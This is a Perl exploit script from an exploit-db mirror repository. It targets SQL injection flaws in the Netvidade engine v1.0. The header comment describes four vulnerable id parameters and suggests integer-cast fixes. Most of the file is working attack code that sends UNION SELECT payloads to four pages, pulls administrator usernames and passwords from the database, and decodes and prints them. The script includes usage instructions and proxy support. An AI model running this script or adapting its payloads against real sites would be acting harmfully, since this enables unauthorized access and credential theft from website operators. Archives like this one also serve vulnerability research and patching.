bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/12550.pl
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

209 lines
No EOL
8.7 KiB
Perl
Executable file
Raw Blame History

#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;
use Getopt::Long;
use MIME::Base64;
# \#'#/
# (-.-)
# ----------------------oOO---(_)---OOo----------------------
# | __ __ |
# | _____/ /_____ ______/ /_ __ ______ ______ |
# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |
# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |
# | Security Research Division /____/ 2o1o |
# -----------------------------------------------------------
# | Netvidade engine v1.0 Multiple Vulnerabilities |
# -----------------------------------------------------------
# [!] Discovered by.: pwndomina
# [!] Vendor........: http://www.netvidade.com
# [!] Detected......: 15.04.2010
# [!] Reported......: 06.05.2010
# [!] Response......: xx.xx.2010
#
# [!] Bug...........: $_GET['id'] in webtemplate-categoria.php near line 6
#
# 3: if ($_GET['id']==0)
# 4: $lista_webtemp=$netvidade->lista_webtemp();
# 5: else
# 6: $lista_webtemp=$netvidade->lista_webtemp_categoria($_GET['id']);
#
# The function lista_webtemp_categoria() is in class/var/netvidade.class.php near line 212
#
# 212: function lista_webtemp_categoria($id)
# 213: {
# 214: $query="select a.*,b.id as categoria_id, b.titulo as categoria_nome from webtemplate a, webtemplate_categorias b where a.categoria=b.id AND a.categoria=$id";
# 215: $a=$this->CORE->db();
# 216: $res=$a->abrecursor($query);
# 217: return $res;
# 218: }
#
# [!] Bug...........: $_GET['id'] in concorrer.php near line 2
#
# 2: $lista_proposta=$recrutamento->lista_proposta($_GET['id']);
#
# The function lista_proposta() is in class/var/recrutamento.class.php near line 42
#
# 42: function lista_proposta($id)
# 43: {
# 44: $query="select * from recrutamento_propostas where id=$id";
# 45: $a=$this->CORE->db();
# 46: $res=$a->abrecursor($query);
# 47: return $res;
# 48: }
#
# [!] Bug...........: $_GET[id] in detalhe.php near line 6
#
# 6: $noticias=$a->lista_noticia_detalhe($_GET[id]);
#
# The function lista_noticia_detalhe() is in class/var/noticias.class.php near line 208
#
# 208: function lista_noticia_detalhe($id)
# 209: {
# 210: $query="
# 211: select a.*,b.id as categoria_id, b.titulo as categoria_nome, c.nome as autor_nome
# 212: from noticias a, noticias_categorias b, administradores c
# 213: where a.categoria=b.id and a.id=$id and a.autor=c.id and a.data_online <= NOW() and if(a.data_offline != '0000-00-00',a.data_offline > NOW(),1)
# 214: ";
# 215:
# 216: $a=$this->CORE->db();
# 217: $res=$a->abrecursor($query);
# 218: return $res;
# 219: }
#
# [!] Bug...........: $_GET[id] in newsletter_preview.php near line 6
#
# 6: $dados=$a->lista_newsletter($_GET[id]);
#
# The function lista_newsletter() is in class/var/newsletter.class.php near line 113
#
# 113: function lista_newsletter($id)
# 114: {
# 115: $query="select a.*,b.nome,c.corpo from newsletter a LEFT JOIN newsletter_corpo c ON a.id=c.id, newsletter_templates b where a.template=b.id and a.id=$id";
# 116: $a=$this->CORE->db();
# 117: $res=$a->abrecursor($query);
# 118: return $res;
# 119: }
#
# [!] Quick fix.....: in class/var/netvidade.class.php line 214
#
# - replace:
# $query="select a.*,b.id as categoria_id, b.titulo as categoria_nome from webtemplate a, webtemplate_categorias b where a.categoria=b.id AND a.categoria=$id";
#
# - with:
# $query="select a.*,b.id as categoria_id, b.titulo as categoria_nome from webtemplate a, webtemplate_categorias b where a.categoria=b.id AND a.categoria=".(int)$id;
#
# [!] Quick fix.....: in class/var/recrutamento.class.php line 44
#
# - replace:
# $query="select * from recrutamento_propostas where id=$id";
#
# - with:
# $query="select * from recrutamento_propostas where id=".(int)$id;
#
# [!] Quick fix.....: in class/var/noticias.class.php line 213
#
# - replace:
# where a.categoria=b.id and a.id=$id and a.autor=c.id and a.data_online <= NOW() and if(a.data_offline != '0000-00-00',a.data_offline > NOW(),1)
#
# - with:
# where a.categoria=b.id and a.id=".(int)$id." and a.autor=c.id and a.data_online <= NOW() and if(a.data_offline != '0000-00-00',a.data_offline > NOW(),1)
#
# [!] Quick fix.....: in class/var/newsletter.class.php line 115
#
# - replace:
# $query="select a.*,b.nome,c.corpo from newsletter a LEFT JOIN newsletter_corpo c ON a.id=c.id, newsletter_templates b where a.template=b.id and a.id=$id";
#
# - with:
# $query="select a.*,b.nome,c.corpo from newsletter a LEFT JOIN newsletter_corpo c ON a.id=c.id, newsletter_templates b where a.template=b.id and a.id=".(int)$id;
#
# [!] Greetings.....: cih.ms and phact.in
#
if(!$ARGV[3])
{
print "\n \\#'#/ ";
print "\n (-.-) ";
print "\n ---------------------oOO---(_)---OOo----------------------";
print "\n | Netvidade engine v1.0 Multiple Vulnerabilities Exploit |";
print "\n | discovered by pwndomina |";
print "\n | coded by DNX |";
print "\n ----------------------------------------------------------";
print "\n[!] Usage: perl netvidade.pl [Host] [Path] [Target] <Options>";
print "\n[!] Example: perl netvidade.pl www.host.com /path/ -t 3 -u 1";
print "\n[!] Targets:";
print "\n -t 1 webtemplate-categoria.php";
print "\n -t 2 concorrer.php";
print "\n -t 3 detalhe.php";
print "\n -t 4 newsletter_preview.php";
print "\n[!] Options:";
print "\n -u [no] User-Id";
print "\n -p [ip:port] Proxy support";
print "\n[!] Notes:";
print "\n For the targets 2, 3 & 4 you can use -u option.";
print "\n";
exit;
}
my %options = ();
GetOptions(\%options, "t=i", "u=i", "p=s");
my $ua = LWP::UserAgent->new();
my $host = $ARGV[0];
my $path = $ARGV[1];
my $target = "http://".$host.$path;
my $userid = "";
if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }
if($options{"u"}) { $userid = "+where+id=".$options{"u"}; }
print "[!] Exploiting...\n\n";
if($options{"t"} == 1) { exploit1(); }
elsif($options{"t"} == 2) { exploit2(); }
elsif($options{"t"} == 3) { exploit3(); }
elsif($options{"t"} == 4) { exploit4(); }
print "\n[!] Exploit done\n";
sub exploit1
{
my $url = "http://".$host.$path."webtemplate-categoria.php?id=-1337+union+select+1,2,concat(0x23,0x23,username,0x23,password,0x23,0x23),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+administradores";
my $res = $ua->get($url);
check($res);
}
sub exploit2
{
my $url = "http://".$host.$path."concorrer.php?id=-1337+union+select+1,concat(0x23,0x23,username,0x23,password,0x23,0x23),3,4,5,6,7,8,9,10+from+administradores".$userid;
my $res = $ua->get($url);
check($res);
}
sub exploit3
{
my $url = "http://".$host.$path."detalhe.php?id=-1337+union+select+1,2,3,concat(0x23,0x23,username,0x23,password,0x23,0x23),5,6,7,8,9,10,11,12,13,14+from+administradores".$userid."/*";
my $res = $ua->get($url);
check($res);
}
sub exploit4
{
my $url = "http://".$host.$path."newsletter_preview.php?id=-1337+union+select+1,concat(0x23,0x23,username,0x23,password,0x23,0x23),3,4,5,6+from+administradores".$userid;
my $res = $ua->get($url);
check($res);
}
sub check
{
my $res = shift;
my $content = $res->content;
my @c = split(/\n/, $content);
foreach (@c)
{
if($_ =~ /##(.*?)#(.*?)##/)
{
print $1.":".decode_base64($2)."\n";
}
}
}
Reference in a new issue View git blame Copy permalink